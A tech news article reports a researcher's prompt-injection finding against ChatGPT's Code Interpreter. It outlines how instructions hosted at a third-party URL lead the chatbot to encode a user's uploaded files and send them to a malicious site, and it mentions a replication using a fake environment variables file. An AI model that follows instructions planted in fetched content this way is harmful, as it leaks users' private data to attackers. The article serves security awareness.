ChatGPT’s new code interpreting tool could become a hacker’s paradise. Here’s how.

A new ChatGPT feature will help you code better, but it might cost you.

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

What you need to know

What you need to know

For a while now, we’ve known ChatGPT can achieve incredible things and make work easier for users, fromdeveloping software in under 7 minutestosolving complex math problemsand more. While it’s already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According toTom’s Hardwareandcybersecurity expert Johann Rehberger, the tool writes Python code by leveraging AI capabilities and even runs it in a sandboxed environment. And while this is an incredible feat, the sandboxed environment bit is a hornet’s nest bred with attackers.

👉 Good opportunity to raise awareness around prompt injection and data exfilration issues.I’m lazy, paste in this URL in your ChatGPT and send it to me. 🙂#chatgpt #infosec https://t.co/SogGZh8cji pic.twitter.com/Dh95xIK4qyNovember 10, 2023

This is mainly because it’s also used to handle any spreadsheets. You might need ChatGPT to analyze and present the data in the form of charts, ultimately making it susceptible to malicious ploys by hackers.

How do hackers leverage this vulnerability?

How do hackers leverage this vulnerability?

Per Johann Rehberger’s findings andTom’s Hardware’s in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions from a third-party URL. This allows it to encode uploaded files into a string that sends the information to a malicious site.

This is highly concerning even though this technique calls for particular conditions. You’ll also require a ChatGPT Plus subscription to access the code-interpreting tool.

RELATED:OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While running tests and trying to replicate this technique, Tom’s Hardware tried to determine the extent of this vulnerability by creating a fake environment variables file and leveraging ChatGPT’s capabilities to process and send this data to an external malicious site.

Get the Windows Central Newsletter

All the latest news, reviews, and guides for Windows and Xbox diehards.

Considering this, the uploads are initiated on a new Linux virtual machine with a dedicated directory structure. While ChatGPT might not provide a command line, it responds to Linux commands, thus allowing users to access the information and files. Through this avenue, hackers can manage to access unsuspecting users' data.

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users?Please share your thoughts with us in the comments.

Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry at Windows Central. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. You’ll also catch him occasionally contributing at iMore about Apple and AI. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.